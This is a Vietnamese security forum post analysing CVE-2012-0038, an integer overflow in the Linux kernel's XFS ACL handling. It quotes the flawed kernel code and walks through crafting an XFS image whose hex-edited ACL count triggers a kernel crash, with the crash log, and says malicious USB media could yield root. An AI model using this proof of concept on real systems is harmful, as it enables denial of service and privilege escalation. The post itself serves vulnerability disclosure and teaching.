banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits CVE-2012-0038: XFS ACL count integer overflow PoC  XML
  [Discussion]   CVE-2012-0038: XFS ACL count integer overflow PoC 08/03/2012 16:21:01 (+0700) | #1 | 257306
cr4zyb0y
Member

[Minus]    0    [Plus]
Joined: 27/05/2010 11:50:30
Messages: 51
Offline
[Profile] [PM]
Một lỗi bảo mật khá cơ bản được tìm ra trong mã nguồn của Linux kernel trong việc thao tác XFS file system.

Trong linux/fs/xfs/xfs_acl.c :

Code:
STATIC struct posix_acl *
xfs_acl_from_disk(struct xfs_acl *aclp)
{
struct posix_acl_entry *acl_e;
struct posix_acl *acl;
struct xfs_acl_entry *ace;
int count, i;

count = be32_to_cpu(aclp->acl_cnt);

acl = posix_acl_alloc(count, GFP_KERNEL);
if (!acl)
return ERR_PTR(-ENOMEM);

for (i = 0; i < count; i++) {
acl_e = &acl->a_entries[i];
ace = &aclp->acl_entry[i];
...
acl_e->e_tag = be32_to_cpu(ace->ae_tag);
acl_e->e_perm = be16_to_cpu(ace->ae_perm);
...
}
return acl;
...
}


Trong posix_acl_alloc chúng ta có:

Code:
struct posix_acl *
posix_acl_alloc(int count, gfp_t flags)
{
const size_t size = sizeof(struct posix_acl) +
count * sizeof(struct posix_acl_entry);
struct posix_acl *acl = kmalloc(size, flags);
if (acl)
posix_acl_init(acl, count);
return acl;
}


Như vậy biến count được khai báo là kiểu Interger. Biến size được tính toán dựa trên :

Code:
const size_t size = sizeof(struct posix_acl) +
count * sizeof(struct posix_acl_entry);


Vấn đề xảy ra khi count quá lớn, dẫn tới phép toán này gây ra tràn số, size sẽ < count. Lúc này bộ nhớ được cấp phát sẽ nhỏ hơn thực tế mà chương trình sử dụng ở:
Code:
for (i = 0; i < count; i++) {
......


Tử đây một lỗi tràn bộ đệm sẽ xảy ra. Kết quả là kernel panic hoặc có thể dẫn tới thực thi mã ( code execution ) ở mức kernel.
Nếu hệ thống có hỗ trợ automount XFS file system, khi chúng ta chuẩn bị một đĩa USB với định dạng XFS với các thông số và mã khai thác phù hợp sẽ dẫn tới lấy quyền root ( vì module này chạy với quyền của kernel) hoặc ít nhất có thể làm crash hệ thống đó.
Mình thấy bug này khá thú vị và nhân tiện cũng muốn hướng dẫn các bạn cách viết exploit cho kernel driver ( nhưng cái như local root mà các bạn hay xài).
Trước tiên chúng ta tạo ra 1 xfs file system chuẩn:

Code:
[root@vulnBox xfs]# dd if=/dev/zero of=expl bs=1M count=40
40+0 records in
40+0 records out
41943040 bytes (42 MB) copied, 0.0600407 s, 699 MB/s
[root@vulnBox xfs]# mkfs.xfs expl
meta-data=expl          isize=256  agcount=2, agsize=5120 blks
=            sectsz=512  attr=2, projid32bit=0
data   =            bsize=4096  blocks=10240, imaxpct=25
=            sunit=0   swidth=0 blks
naming  =version 2       bsize=4096  ascii-ci=0
log   =internal log      bsize=4096  blocks=1200, version=2
=            sectsz=512  sunit=0 blks, lazy-count=1
realtime =none          extsz=4096  blocks=0, rtextents=0
[root@vulnBox xfs]#


Tiếp theo, mount nó ra và tạo 1 file rồi thay đổi ACL cho nó( vì phần bị lỗi ở xfs_acl):

Code:
[root@vulnBox xfs]# mount expl /mnt/tm/
[root@vulnBox xfs]# echo "coolExploit" > /mnt/tm/hellosuto
[root@vulnBox xfs]# setfacl -m u:user:rw- /mnt/tm/hellosuto
[root@vulnBox xfs]# getfattr -e hex -dm '.*' /mnt/tm/hellosuto
getfattr: Removing leading '/' from absolute path names
# file: mnt/tm/hellosuto
security.selinux=0x756e636f6e66696e65645f753a6f626a6563745f723a66696c655f743a733000
system.posix_acl_access=0x0200000001000600ffffffff02000600e803000004000400ffffffff10000600ffffffff20000400ffffffff
trusted.SGI_ACL_FILE=0x0000000500000001ffffffff0006000000000002000003e80006000000000004ffffffff0004000000000010ffffffff0006000000000020ffffffff00040000

[root@vulnBox xfs]# getfacl /mnt/tm/hellosuto
getfacl: Removing leading '/' from absolute path names
# file: mnt/tm/hellosuto
# owner: root
# group: root
user::rw-
user:user:rw-
group::r--
mask::rw-
other::r--


Mở ra bằng 1 hex editor và thay đổi:

Code:
0000DF60  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................................
0000DF80  00 00 00 00 00 40 0C 53 47 49 5F 41 43 4C 5F 46 49 4C 45 00 00 00 05 00 00 00 01 FF FF FF FF 00 .....@.SGI_ACL_FILE.............


Từ :
49 4C 45 00 00 00 05
49 4C 45 40 00 00 00
để chuyển số lượng ACL entry từ 5 sang 0×40000000.
Và :

Code:
[ 4107.439000] BUG: unable to handle kernel paging request at ffffffff
[ 4107.439015] IP: [<c04df18e>] __kmalloc+0x9d/0xff
[ 4107.439023] *pde = 00ffc067 *pte = 00000000
[ 4107.439023] Oops: 0000 [#1] SMP
[ 4107.439023] Modules linked in: xfs fcoe libfcoe 8021q garp stp llc lockd libfc scsi_transport_fc scsi_tgt ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 nf_conntrack_ipv4 nf_defrag_ipv4 ip6table_filter xt_state ip6_tables nf_conntrack ppdev snd_intel8x0 snd_ac97_codec ac97_bus snd_seq snd_seq_device parport_pc snd_pcm snd_timer snd soundcore joydev i2c_piix4 microcode i2c_core parport e1000 snd_page_alloc sunrpc uinput [last unloaded: scsi_wait_scan]


Như vậy chúng ta đã có sample để trigger bug này, phần tiếp theo các bạn có thể theo dõi ở : http://bkitsec.vn .
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|